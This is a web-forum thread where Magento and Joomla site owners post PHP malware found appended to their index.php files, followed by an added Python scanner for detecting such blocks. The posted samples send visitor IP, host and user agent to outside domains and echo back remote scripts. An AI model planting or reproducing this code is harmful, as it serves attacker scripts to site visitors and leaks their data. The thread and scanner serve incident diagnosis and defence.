Magento Forum

Security Issue (possible hack)
 
lisandroc
Jr. Member
 
Total Posts:  10
Joined:  2010-02-10
 

Dear sirs, I hope one of you can give us an answer for this problem.

We're experiencing a strange issue in a couple of stores and we don't know what is happening.

The problem started when we saw that every JavaScript on the store fails, and nobody can buy, because JavaScript reports many errors on many files.

We saw that many js files contained in the js folder were modified, and for some unknown reason our index.php files are also modified, with this portion of code appended at the end of the file.

#47c179#
error_reporting(0); ini_set('display_errors',0); $wp_kw972 = @$_SERVER['HTTP_USER_AGENT'];
if ( preg_match ('/Gecko|MSIE/i', $wp_kw972)){
$wp_kw09972="http://"."html"."-href".".com/href"."/?ip=".$_SERVER['REMOTE_ADDR']."&referer=".urlencode($_SERVER['HTTP_HOST'])."&ua=".urlencode($wp_kw972);
echo $wp_kw09972;
$ch = curl_init(); curl_setopt ($ch, CURLOPT_URL,$wp_kw09972);
curl_setopt ($ch, CURLOPT_TIMEOUT, 5); curl_setopt($ch, CURLOPT_RETURNTRANSFER, 1); $wp_972kw = curl_exec ($ch); curl_close($ch); //}
if ( substr($wp_972kw,1,3) === 'scr' ){
echo $wp_972kw;
}
#/47c179#

It seems that this command is sending info to this site: http://html-href.com/href from China (hack??)

Solution: We restored every original index.php file and all the files contained on /js folder but.... it happens again.

Now we have changed every password and we don't know if it's going to happen again, but we think that it could be caused by a plugin, but we don't know.

 
 
magestyx
Jr. Member
 
Total Posts:  1
Joined:  2014-01-06
 

Did you get this issue solved?

I'm asking since yesterday we had 3 Joomla sites hacked with this similar code, although there were two different domains from what yours was being directed to.  I'm searching all I can to find out how they got in - we have our Joomla sites locked down really tight so this is a huge surprise.

All the domains are from China, and we found the code in the Joomla template index.php files.

I'll post the code below.  Any info on this would be hugely appreciated.  We've looked all day so far and haven't found any trace of how they might've done this.

Thanks,

Magestyx

=================
#12220e#
error_reporting(0); ini_set('display_errors',0); $wp_l3 = @$_SERVER['HTTP_USER_AGENT'];
if (( preg_match ('/Gecko|MSIE/i', $wp_l3) && !preg_match ('/bot/i', $wp_l3))){
$wp_l093="http://"."tags"."value".".com/value"."/?ip=".$_SERVER['REMOTE_ADDR']."&referer=".urlencode($_SERVER['HTTP_HOST'])."&ua=".urlencode($wp_l3);
$ch = curl_init(); curl_setopt ($ch, CURLOPT_URL,$wp_l093);
curl_setopt ($ch, CURLOPT_TIMEOUT, 6); curl_setopt($ch, CURLOPT_RETURNTRANSFER, 1); $wp_3l = curl_exec ($ch); curl_close($ch);}
if ( substr($wp_3l,1,3) === 'scr' ){ echo $wp_3l; }
#/12220e#
-------------------------
#3c4fb6#
error_reporting(0); ini_set('display_errors',0); $wp_wzf80861 = @$_SERVER['HTTP_USER_AGENT'];
if (( preg_match ('/Gecko|MSIE/i', $wp_wzf80861) && !preg_match ('/bot/i', $wp_wzf80861))){
$wp_wzf0980861="http://"."template"."class".".com/class"."/?ip=".$_SERVER['REMOTE_ADDR']."&referer=".urlencode($_SERVER['HTTP_HOST'])."&ua=".urlencode($wp_wzf80861);
$ch = curl_init(); curl_setopt ($ch, CURLOPT_URL,$wp_wzf0980861);
curl_setopt ($ch, CURLOPT_TIMEOUT, 6); curl_setopt($ch, CURLOPT_RETURNTRANSFER, 1); $wp_80861wzf = curl_exec ($ch); curl_close($ch);}
if ( substr($wp_80861wzf,1,3) === 'scr' ){ echo $wp_80861wzf; }
#/3c4fb6#
=================
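
Added example (not part of either post above, and not Magento or Joomla code): all three posted samples sit between a paired `#xxxxxx#` / `#/xxxxxx#` marker and build their URL from concatenated string fragments, so this Python scanner finds such blocks, lists the traits they share, and rejoins the fragments to recover the contacted URL for log searches. The sample input, its `.example` host, and the function names are constructed for illustration.

```python
import re
from pathlib import Path

# Paired marker shared by all three posted samples: #47c179# ... #/47c179#
BLOCK = re.compile(r"#([0-9a-f]{6})#(.*?)#/\1#", re.DOTALL)
# Traits the posted samples have in common (heuristics, not a full signature).
TRAITS = {
    "hides_errors": re.compile(r"error_reporting\s*\(\s*0\s*\)"),
    "ua_gate": re.compile(r"HTTP_USER_AGENT"),
    "remote_fetch": re.compile(r"curl_exec\s*\("),
    "echoes_response": re.compile(r"===\s*['\"]scr['\"]"),
}
# The URL is split as "a"."b", so a plain grep for the host name misses it.
CONCAT = re.compile(r"[\"']\s*\.\s*[\"']")
URL = re.compile(r"https?://[^\s\"'?]+")

# Constructed sample (not from the thread): a look-alike block for testing.
SAMPLE = """<?php
#abc123#
error_reporting(0); $ua = @$_SERVER['HTTP_USER_AGENT'];
if (preg_match('/Gecko|MSIE/i', $ua)) {
$u = "http://"."tracker"."-host".".example/path"."/?ua=".urlencode($ua);
$ch = curl_init(); curl_setopt($ch, CURLOPT_URL, $u); $r = curl_exec($ch); }
if (substr($r,1,3) === 'scr') { echo $r; }
#/abc123#
"""

def find_injections(text):
    """Return one dict per marker-delimited block found in text."""
    hits = []
    for m in BLOCK.finditer(text):
        body = m.group(2)
        hits.append({
            "marker": m.group(1),
            "line": text.count("\n", 0, m.start()) + 1,
            "traits": sorted(k for k, rx in TRAITS.items() if rx.search(body)),
            "urls": URL.findall(CONCAT.sub("", body)),  # rejoin split literals
        })
    return hits

def scan_tree(root, pattern="*.php"):
    """Map path -> hits under root; only the PHP form was posted in the thread."""
    report = {}
    for path in (p for p in Path(root).rglob(pattern) if p.is_file()):
        hits = find_injections(path.read_text(encoding="utf-8", errors="replace"))
        if hits:
            report[str(path)] = hits
    return report
```

Run `scan_tree` against a copy of the webroot. The first post reports that restoring the files did not stop the change from recurring, so a hit is also a prompt to find how the files are being written.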

 